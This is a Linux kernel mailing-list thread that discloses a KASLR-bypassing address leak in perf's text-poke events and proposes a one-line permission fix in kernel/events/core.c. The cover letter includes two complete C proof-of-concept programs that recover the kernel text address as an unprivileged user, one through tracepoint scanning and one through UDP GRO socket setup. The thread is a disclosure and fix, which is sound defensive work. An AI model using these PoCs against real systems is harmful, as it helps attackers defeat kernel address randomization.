* [PATCH 0/1] perf/core: Text-poke events expose the kernel text base
@ 2026-09-28 17:59 Zhengchuan Liang
2026-09-28 17:59 ` [PATCH 1/1] perf/core: Require kernel access for text poke events Zhengchuan Liang
0 siblings, 1 reply; 2+ messages in thread
From: Zhengchuan Liang @ 2026-09-28 17:59 UTC (permalink / raw)
To: Peter Zijlstra
Cc: Ingo Molnar, Arnaldo Carvalho de Melo, Namhyung Kim,
Mark Rutland, Alexander Shishkin, Jiri Olsa, Ian Rogers,
Adrian Hunter, James Clark, linux-perf-users, linux-kernel,
Zhengchuan Liang
Hi,
I found and validated a kernel address disclosure through perf's
text-poke sideband. At the upstream default perf_event_paranoid=2, an
unprivileged user can open a task-local PERF_COUNT_SW_DUMMY event with
exclude_kernel=1 and text_poke=1, then mmap its ring buffer.
PERF_RECORD_TEXT_POKE records contain raw relocated kernel instruction
addresses, revealing the runtime kernel text base for a known image
despite KASLR.
A disabled, count-only PERF_TYPE_TRACEPOINT event can trigger the leak:
registering its first perf consumer updates an inline static call, and the
observer receives the resulting text-poke record. Numeric tracepoint IDs
can be scanned without tracefs access. A UDP GRO static-call update
independently triggers the same disclosure, so restricting tracepoint
registration would leave the underlying leak open.
The first minimized x86_64 PoC scans tracepoint IDs instead of assuming
a fixed ID. Run both PoCs as an unprivileged user with
perf_event_paranoid=2.
------BEGIN poc1------
#define _GNU_SOURCE
#include <linux/perf_event.h>
#include <stdint.h>
#include <stdio.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <unistd.h>
#define DATA_PAGES 8
#define MAX_ID 65535
struct text_poke {
struct perf_event_header header;
uint64_t addr;
uint16_t old_len;
uint16_t new_len;
};
static int perf_open(uint32_t type, uint64_t config, int disabled,
int text_poke)
{
struct perf_event_attr attr = {
.type = type,
.size = sizeof(attr),
.config = config,
.sample_period = text_poke,
.wakeup_events = 1,
.disabled = disabled,
.exclude_kernel = 1,
.text_poke = text_poke,
};
return syscall(SYS_perf_event_open, &attr, 0, -1, -1, 0);
}
int main(void)
{
long page_size = sysconf(_SC_PAGESIZE);
struct perf_event_mmap_page *meta;
unsigned char *data;
uint64_t head, tail;
unsigned int id;
int observer;
observer = perf_open(PERF_TYPE_SOFTWARE,
PERF_COUNT_SW_DUMMY, 0, 1);
if (observer < 0) {
perror("observer perf_event_open");
return 1;
}
meta = mmap(NULL, (DATA_PAGES + 1) * page_size,
PROT_READ | PROT_WRITE, MAP_SHARED, observer, 0);
if (meta == MAP_FAILED) {
perror("mmap");
return 1;
}
data = (unsigned char *)meta + page_size;
for (id = 1; id <= MAX_ID; id++) {
uint64_t before = __atomic_load_n(&meta->data_head,
__ATOMIC_ACQUIRE);
int trigger = perf_open(PERF_TYPE_TRACEPOINT,
id, 1, 0);
if (trigger < 0)
continue;
head = __atomic_load_n(&meta->data_head,
__ATOMIC_ACQUIRE);
if (head != before)
break;
close(trigger);
}
if (id > MAX_ID)
return 2;
tail = meta->data_tail;
while (tail < head) {
struct text_poke *record = (void *)(data +
(tail & (meta->data_size - 1)));
if (record->header.type == PERF_RECORD_TEXT_POKE) {
printf("id=%u text_poke_address=%#llx\n", id,
(unsigned long long)record->addr);
return 0;
}
tail += record->header.size;
}
return 3;
}
------END poc1------
The second PoC triggers a static-call update by configuring UDP GRO and
ESP-in-UDP on an IPv4 UDP socket.
------BEGIN poc2------
#define _GNU_SOURCE
#include <linux/perf_event.h>
#include <linux/udp.h>
#include <netinet/in.h>
#include <stdint.h>
#include <stdio.h>
#include <sys/mman.h>
#include <sys/socket.h>
#include <sys/syscall.h>
#include <unistd.h>
#define DATA_PAGES 8
struct text_poke {
struct perf_event_header header;
uint64_t addr;
uint16_t old_len;
uint16_t new_len;
};
int main(void)
{
struct perf_event_attr attr = {
.type = PERF_TYPE_SOFTWARE,
.size = sizeof(attr),
.config = PERF_COUNT_SW_DUMMY,
.sample_period = 1,
.wakeup_events = 1,
.exclude_kernel = 1,
.text_poke = 1,
};
long page_size = sysconf(_SC_PAGESIZE);
struct perf_event_mmap_page *meta;
unsigned char *data;
uint64_t head, tail;
int one = 1, encap = UDP_ENCAP_ESPINUDP;
int observer, sock;
observer = syscall(SYS_perf_event_open, &attr, 0, -1, -1, 0);
if (observer < 0) {
perror("observer perf_event_open");
return 1;
}
meta = mmap(NULL, (DATA_PAGES + 1) * page_size,
PROT_READ | PROT_WRITE, MAP_SHARED, observer, 0);
if (meta == MAP_FAILED) {
perror("mmap");
return 1;
}
data = (unsigned char *)meta + page_size;
sock = socket(AF_INET, SOCK_DGRAM, 0);
if (sock < 0 ||
setsockopt(sock, IPPROTO_UDP, UDP_GRO, &one, sizeof(one)) ||
setsockopt(sock, IPPROTO_UDP, UDP_ENCAP,
&encap, sizeof(encap))) {
perror("UDP setup");
return 1;
}
head = __atomic_load_n(&meta->data_head, __ATOMIC_ACQUIRE);
tail = meta->data_tail;
while (tail < head) {
struct text_poke *record = (void *)(data +
(tail & (meta->data_size - 1)));
if (record->header.type == PERF_RECORD_TEXT_POKE) {
printf("text_poke_address=%#llx\n",
(unsigned long long)record->addr);
return 0;
}
tail += record->header.size;
}
return 2;
}
------END poc2------
I reproduced the leak through both triggers as an unprivileged user on a
kernel built from Torvalds' v7.3-rc5.
Zhengchuan Liang (1):
perf/core: Require kernel access for text poke events
kernel/events/core.c | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
--
2.34.1
^ permalink raw reply [flat|nested] 2+ messages in thread* [PATCH 1/1] perf/core: Require kernel access for text poke events
2026-09-28 17:59 [PATCH 0/1] perf/core: Text-poke events expose the kernel text base Zhengchuan Liang
@ 2026-09-28 17:59 ` Zhengchuan Liang
0 siblings, 0 replies; 2+ messages in thread
From: Zhengchuan Liang @ 2026-09-28 17:59 UTC (permalink / raw)
To: Peter Zijlstra
Cc: Ingo Molnar, Arnaldo Carvalho de Melo, Namhyung Kim,
Mark Rutland, Alexander Shishkin, Jiri Olsa, Ian Rogers,
Adrian Hunter, James Clark, linux-perf-users, linux-kernel,
Zhengchuan Liang, stable
Perf events with exclude_kernel=1 can be opened without kernel perf
access. However, exclude_kernel does not suppress text-poke sideband
records. Every PERF_RECORD_TEXT_POKE is marked PERF_RECORD_MISC_KERNEL
and contains a raw kernel instruction address.
An unprivileged task can therefore open and mmap a task-local software
event with text_poke=1. Both opening a count-only tracepoint event and
configuring UDP GRO for ESP-in-UDP cause updates to inline static calls;
the observer receives the relocated addresses of the modified instructions.
For a known kernel image, any such address reveals the runtime kernel
text base despite KASLR.
Call perf_allow_kernel() whenever attr.text_poke is set, regardless of
exclude_kernel. Events that neither monitor kernel execution nor request
text-poke records retain their existing permissions.
Fixes: e17d43b93e54 ("perf: Add perf text poke event")
Cc: stable@vger.kernel.org
Assisted-by: LLM
Signed-off-by: Zhengchuan Liang <zcliangcn@gmail.com>
---
kernel/events/core.c | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/kernel/events/core.c b/kernel/events/core.c
index 634d2ccbab82..b4e6e8ae3be7 100644
--- a/kernel/events/core.c
+++ b/kernel/events/core.c
@@ -13953,7 +13953,7 @@ SYSCALL_DEFINE5(perf_event_open,
if (err)
return err;
- if (!attr.exclude_kernel ||
+ if (!attr.exclude_kernel || attr.text_poke ||
((attr.sample_type & PERF_SAMPLE_CALLCHAIN) &&
!attr.exclude_callchain_kernel)) {
err = perf_allow_kernel();
--
2.34.1
^ permalink raw reply [flat|nested] 2+ messages in thread
end of thread, other threads:[~2026-09-28 18:00 UTC | newest]
Thread overview: 2+ messages (download: mbox.gz / follow: Atom feed)
-- links below jump to the message on this page --
2026-09-28 17:59 [PATCH 0/1] perf/core: Text-poke events expose the kernel text base Zhengchuan Liang
2026-09-28 17:59 ` [PATCH 1/1] perf/core: Require kernel access for text poke events Zhengchuan Liang
This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox
all inboxes | Powered by JetHome®